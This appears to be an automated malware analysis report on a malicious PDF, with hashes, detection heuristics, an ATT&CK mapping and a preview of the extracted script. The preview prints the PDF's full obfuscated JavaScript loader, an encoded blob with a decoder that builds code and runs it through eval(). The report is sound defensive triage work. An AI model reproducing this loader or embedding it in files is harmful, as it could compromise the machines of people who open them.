Malicious PDF — malware analysis report

Static analysis result for SHA-256 b2d7d01561b68993…

MALICIOUS

PDF

7.1 KB Created: 2008-31-20 53:85:00 (not a valid calendar date/time; shown as reported) Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 47d4dca7421b8ce8cbf7721a6832001a SHA-1: a6bc35243b8aba4deba453e445a740bf3d2ed1a4 SHA-256: b2d7d01561b689934071657f60d8ac69df3378242c2262ece1f963b8dd57b72d
Risk Score: 166

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The embedded JavaScript uses eval() calls and string concatenation to construct and execute code. The primary intent appears to be downloading and executing a second-stage payload; this is inferred from the complex string manipulation and eval usage, not from a recovered URL or other network indicator. The JavaScript is too obfuscated to fully reconstruct its exact actions, so confidence in this assessment is moderate.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function QoqdoAHtTAHVa() {var datfield = 'km01f195mGt@8cTTHik'+'MkQiiH@tB'+'kB'+'S0'+'f0B'+'x'+'Z'+'tFTkm'+'B'+'B'+'H5kBJGQNkk'+'BC@5fMNk1lNo'+'BxI_o0ZCk'+'@'+'Nvkp@PAiPitC'+'cbBkooA'+'iW'+'1FBZokNi1'+'AjL'+'1Pk8i'+'x1H'+'7B9'+'HJkBZq7@Ck'+'L9'+'Y'+'yt'+'I1'+'BxjWlk'+'@Nvkp@1Fjl971BmUIF0tTl17'+'1BmUIF0kil971BmUIF0Qdx'+'@y1xi'+'y0JVt9'+'Z'+'9idPitCcb'+'BkoG7@'+'Jviif'+'@kB1lyNkCk'+'@Nvkp@b'+'iil1791Vt19otNH19lgbSxbJQkA0'+'@jJ9'+'Fxkm01f1'+'A0BUiMZUQp'+'019Lk9ixBpk@T1U1BptTkm01'+'f19p2GSNLl1kkQii1 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3DD 5662 bytes
SHA-256: d85dabd8e143543462747538a6998386b96411035679c3aff7e31bf60f8ad6dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). 114 of 195 identifiers look randomly generated (e.g. 'fC1AjxiwMY5BN01UWBQTilQiiI97Ad9F0FGKCTyB'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function QoqdoAHtTAHVa() {var datfield = 'km01f195mGt@8cTTHik'+'MkQiiH@tB'+'kB'+'S0'+'f0B'+'x'+'Z'+'tFTkm'+'B'+'B'+'H5kBJGQNkk'+'BC@5fMNk1lNo'+'BxI_o0ZCk'+'@'+'Nvkp@PAiPitC'+'cbBkooA'+'iW'+'1FBZokNi1'+'AjL'+'1Pk8i'+'x1H'+'7B9'+'HJkBZq7@Ck'+'L9'+'Y'+'yt'+'I1'+'BxjWlk'+'@Nvkp@1Fjl971BmUIF0tTl17'+'1BmUIF0kil971BmUIF0Qdx'+'@y1xi'+'y0JVt9'+'Z'+'9idPitCcb'+'BkoG7@'+'Jviif'+'@kB1lyNkCk'+'@Nvkp@b'+'iil1791Vt19otNH19lgbSxbJQkA0'+'@jJ9'+'Fxkm01f1'+'A0BUiMZUQp'+'019Lk9ixBpk@T1U1BptTkm01'+'f19p2GSNLl1kkQii1VB9'+'x5B'+'1B@'+'kjLk9B9pikxk9B9pik'+'xk'+'9B9'+'pik'+'x'+'k9B'+'BmfCS@9Bxp1kS@9'+'BNmUl5k9Bp9Pl5k9Bp9i@0k9BPcK@'+'xk9BPlik'+'xk9BPlSCy@9BP'+'Ui@1k9BzcfC3@'+'9'+'B'+'zcSCz@9'+'BpCK'+'kz@9B7cLkP@9BPcfC'+'z@9BNA1Cz@9'+'BP51lz@9B5mSk'+'9k'+'9B9CPCxk9B5'+'mSk9k9BNkfCIk9B'+'P'+'cL@xk9'+'BP'+'cfCS@9BNA1Cz@'+'9BSoi@'+'xk9BNBiTIk'+'9BP01l0k'+'9B'+'BZi@'+'x'+'k9BPcf@0k'+'9BPcfCz@9By'+'0SkNk9BSo1C'+'S'+'@9BIZi'+'TIk9BNk1@0k'+'9BBZ1C0k9BP'+'cf@z@9BPcfCz@9By0S'+'kNk9B'+'So1CIk'+'9B30LTIk9'+'B091kz@9BB'+'ZP@7@9BPcL@7@9B'+'PcfCz@'+'9By0SkNk9BSo1Cxk9BB9iTIk9BBmS@0k9'+'BBZiTz@9BPcK@S@9BPcf'+'Cz'+'@9By'+'0SkNk9BSoPCz@9BfkLTIk9BBBfTNk9BBZ1kIk9BPcS@5k9BPcfCz@'+'9By0SkNk9By'+'cSCS@9B7JP'+'kz@9B5BS'+'@3@9BNm1'+'@'+'1k9BzJ1ly@9BPUi@Nk9BPcfCP@'+'9BS01Cz@9'+'B5BSkNk9BNAUl'+'S@9BPlfly'+'@9BP@LT1k9'+'BNAPlNk9BzJP'+'ly@9BBZPl5k9BPcSk9'+'k9B'+'Pc'+'fCz@9BpZ'+'Plz@9'+'Bz'+'@i'+'C5k9B5mK'+'lBk9BIFi@Ik9'+'BPcfCz@9'+'BNm1Cz@9Bz5'+'1ly@9B'+'f'+'BSk9k9BfmSk'+'3@9BN'+'m'+'Pl'+'z@9B3cfly@9B09iTIk9BPcfCz@9BScf'+'Cz@9By'+'0Sk9k'+'9B'+'pkPCS@9BSc1C7@9BS0Sk9k9BBZ'+'PCIk9BPc'+'LTP@9BPcfCz@9By'+'0f'+'C3@'+'9BfFUlz@9BS51Cz@'+'9B'+'301'+'T0k9BfFiTy@9BPlfl'+'z@9BpBf'+'TIk9BPcfCz'+'@9'+'B'+'5Bf@Bk9BNAUlz@9'+'BP51ly@9'+'BP@LT1k'+'9B'+'NA'+'PlN'+'k9BzJP'+'ly@9B'+'ycL@'+'Ik9BPcfCz@9Bpk1Cz@'+'9BSJ1Cpk'+'9By'+'0fC3@9B7'+'5KlS@9B'+'S5K@'+'9k9B09Pl3@'+'9B3cfTy@9BS5'+'Slz@9'+'By0Sk'+'9k9BpkPCxk9'+'BSc1Cy@9BS0Sk'+'9k'+'9B'+'BZPCIk9BPcKl3@9B'+'PcfCz@9BPcLT1'+'k9'+'B5Bf'+'@Bk'+'9BN'+'AUlz@9B'+'PJ1ly@9'+'B'+'PiL'+'T1k9B'+'NAPlNk9Bz
JPly@9B'+'zcL@Ik9BPcfCz@9Bpk1Cz@9B'+'NA1@Bk9Bz'+'cfl'+'y@9BP'+'@L'+'T1'+'k9BNAPlNk9BzJ'+'Pl'+'y@9BPcL@Ik9'+'BP'+'cfCz'+'@9By@fCz@9BSiSl9'+'k9'+'BBk'+'fC3@9BBkfC3@9BBk'+'fC'+'3@9BB'+'kfC3@9BBp'+'Pk3@9BS@1C'+'S@9BNAPl3@9BBAK@1k9BSi'+'f@pk'+'9BBmf@Bk9BN'+'APly@9BN'+'Ai@'+'xk9B'+'PJ1Tfk9BSlPk9k9BS'+'o1C'+'xk'+'9B5pSk9'+'k9B'+'NAiCxk9Bz01TS@9BP5fTIk9BSo'+'1@3'+'@9'+'B5tPk9k9BP'+'5Klz@9B75f@3@'+'9'+'BycP@Nk9B9C'+'1lP@9BfpfC3@9B7'+'5Sl5k9'+'BP1'+'1@'+'5'+'k9Bzcfk'+'0'+'k9B0A'+'LC1k9BPJ1'+'TS@9BfBP@P@9BP5fCfk9Bycf@7'+'@'+'9B0k'+'L@9k9B0BiC9k9B5BS'+'l0'+'k9BS@i@y'+'@9'+'B'+'BA'+'Pk'+'9k9BS'+'@Pk9k9'+'BP'+'5KlS'+'@9BptU'+'@fk9BP5Pk9'+'k9BNA1l9k'+'9Bz5Pl1k9BxC1C3@9BPlSk'+'9k9BP5Sk'+'9k9B'+'S0P@y@'+'9BfASlfk9BPcfCI'+'k9B'+'0CL@'+'Ik'+'9B'+'091@0k9BS'+'0'+'f'+'@Bk9B'+'y5P'+'l7@9B'+'y11lfk9'+'BPcfl0k9BIAPkpk9B'+'I9Uk9k9BfmK@y'+'@9B'+'NAP@z'+'@9BNZP'+'k5k9BIAPk5k9'+'BIAUkxk9BIZPkz@9'+'Bf'+'kSkP@9BNFUkBk9'+'BNk'+'KkBk9BIAPk1k9BIkP@P@9BfmK'+'kxk9BNmSk3@9BNAPk0k9BI9P@P@9BI9P'+'kpk'+'9BNtU@'+'z@9BxASk9k9BfmU@I'+'k9BI9Ukxk9'+'BxAS'+'k3@9BB9U@9C9j'+'W97B@l'+'@ino'+'kWmi'+'1CFq3kY0@il9A@pii'+'@'+'B9i'+'@'+'B'+'viiN0Q0kmT9fZkIt530P'+'bL5kQ'+'iiU'+'bKMHlQ@1gA'+'NiVt'+'99UkiE97@W97B@l@iPit'+'CcbB'+'ko'+'19Lkmx'+'IvP'+'kkP'+'i3WNZf'+'0'+'kQAiZmT9fZkIt'+'530PbL589'+'i'+'x'+'x'+'F1jW97B@l@iL1Pk8ix1kQi'+'i1VB'+'9x5B1B@kjLk9'+'B591TBk9B'+'591TBC'+'9j'+'W'+'971BmUIF0k'+'il999P0tlVc1kyc0I'+'5JPxxU71BmUIF0kdkkL9YytI1'+'BxjW97B@l'+'@iXU@@O0tp'+'NkfC'+'T1'+'9L'+'kF'+'A0BUiMZUQp019dk'+'9ix99i@B9i@Ju'+'7pJUTN9kLp6cUC0b'+'iid'+'GQ0kF7B@l@i81'+'i0fox'+'lSU3If'+'iBMl9UT81i0foxlS'+'U3IfiBM'+'C_@'+'x'+'Bgf1'+'ac1C'+'P5t'+'T81i0foxlSU3IfiBM8v9jkv@i'+'o'+'PtNxvQppgk'+'9gbwIB9y0b0SlvqQ0AyfXkQiiL'+'1P'+'k8'+'ix1'+'k'+'vAi'+'U'+'bKM'+'Hl'+'Q@1viil1'+'9fkmBBH5kBJ'+'GQNkA30Fl'+'@x8UkjJ9F'+'xkm01f19BgGKk'+'9'+'uBW1i'+'iil991B1ydNoB9I@Q0n@'+'Q0xo'+'tNHVAB'+'e5TBfoQNjU9jW99BgG'+'Kk'+'9uBW1i'+'ii'+'l99BgGKk9uBW1iPdf@k'+'0m0t1i'+'U'+'Fd_iKdjP7iLtFTkm01f1'+'F0FGKC'+'TyB0B9'+'9Lk'+'gB9I19l'+'fl015'+'U9BgGKk9uBW1iPdTUB1f0
LBZ91jmk@MrJike'+'oxB9gF1Z0Q0'+'yi@j0tAd'+'1PKMIAUNb@@kHpk'+'I@l0l9'+'U7'+'@'+'JtFTkt'+'Q9kFAjxi'+'wMY5BN01UWBQTilQiip'+'97Ad'+'9AjZp@prJK1c0@@R01X'+'k'+'Q'+'1LkBiidm'+'Aix'+'iwMY5B'+'N01UWfQT'+'i'+'C97@J9AfC'+'1F0FGKCTy'+'B0Bvx@'+'q1ALkB1jJ9A'+'fC1AjxiwMY5BN01UWBQTilQiiI97Ad9F0FGKCTyB0Bvx@q1ALk'+'B1jk7@fkFF0FGKCTy'+'B0BvT@q1A'+'LkZ1jJ9Fxk'+'BLM'+'2q0Wjci90U9jW97B@'+'l@iwVfp1Zkil99BH@t0T0k0iU7iik@@T1U1ik@@T'+'1'+'U1'+'LtFTkZ@IJPB9Zp3MU@U9H7B9HJkBZ1AL'+'kAik5kP@J9F5O@xk'+'j1Fjl'+'9'+'F5O@xkjbi'+'i9UBIxVF1ePkN'+'@lt59G'+'Q0i19LkpKNmP'+'B1LVF1e'+'PkNi5kBPyB1JPB4HctNZ'+'vo0'+'1lQIX97iL79NxJQTkp3MU@U9loFT'+'kQ@il'+'1'+'Apfi30p'+'bkIZt'+'FT'; function uJIGghb5ne(CYwFsPd9){ var tp = '63@59@5@13@49@55@20@10@37@58@0@0@0@0@0@0@47@42@62@50@17@36@26@7@32@57@39@28@44@48@56@0@11@14@21@12@45@27@3@53@52@9@38@0@0@0@0@18@0@25@23@35@40@33@60@2@16@43@41@46@51@34@24@31@54@19@1@4@30@6@22@29@61@15@8'; var QzgHMulnxq0=0, HzBH5Zm9F=CYwFsPd9.length, FoSz59gfDTK=1024, xs46kTjtV0shQ, pD6XLmL, tPwS60wPGmIK='', mnawJ=QzgHMulnxq0, e2BmIOspjfAXQ=QzgHMulnxq0, Mtfdp5ucN=QzgHMulnxq0, AQ36MMpCN=Array(); AQ36MMpCN = tp.split('@'); for(eval('pD6XLmL=Ma'+'th.'+'ce'+'il(HzBH5Zm9F'+'/FoSz59gfDTK)');pD6XLmL>QzgHMulnxq0;pD6XLmL--){ for(eval('xs46kTjtV0shQ=M'+'ath'+'.m'+'in(HzBH5Zm9F,'+'FoSz59gfDTK)');xs46kTjtV0shQ>QzgHMulnxq0;xs46kTjtV0shQ--,HzBH5Zm9F--){ eval('Mtfdp5ucN|'+'=(AQ36MMpCN['+'CYwFsPd9.'+'cha'+'rCo'+'de'+'At(mnawJ+'+'+)-48])<'+'<e2BmIOspjfAXQ'); if(e2BmIOspjfAXQ){ eval('tPwS60wPGmIK+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](142^'+'Mtfdp5ucN&'+'25'+'5)'); Mtfdp5ucN>>=8; e2BmIOspjfAXQ-=2; } else { e2BmIOspjfAXQ=6; } } } eval(tPwS60wPGmIK); } uJIGghb5ne(datfield);}